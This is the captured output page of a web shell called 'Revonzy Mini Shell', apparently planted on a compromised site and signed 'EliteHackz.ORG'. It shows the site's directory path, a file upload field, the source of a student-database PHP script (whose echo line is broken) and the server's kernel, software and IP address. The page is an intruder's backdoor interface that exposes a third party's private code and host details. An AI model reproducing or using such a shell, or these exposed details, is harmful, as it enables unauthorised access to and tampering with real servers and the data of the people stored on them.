Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/www/panel.atsevairag.com/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/www/panel.atsevairag.com/paste.php

<?php
	//import the functions file
	require_once("lib/class/functions.php");
	
	//create object of class file
	$db = new functions();
	
	$stud_name_data = $db->get_registered_students_data();
	
	foreach($stud_name_data as $record)
	{
	    $stud_id = $record['id'];
	    $sirname = $record['sirname'];
	    $name = $record['name'];
	    $father_name = $record['father_name'];
	    
	    $full_name = $sirname." ".$name." ".$father_name;
	 
	    if($db->update_stud_data_new($stud_id,$full_name))
	    {
	        echo "<td><td>$stud_id." - ".$full_name</td></tr>";
	    }
	}
?>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4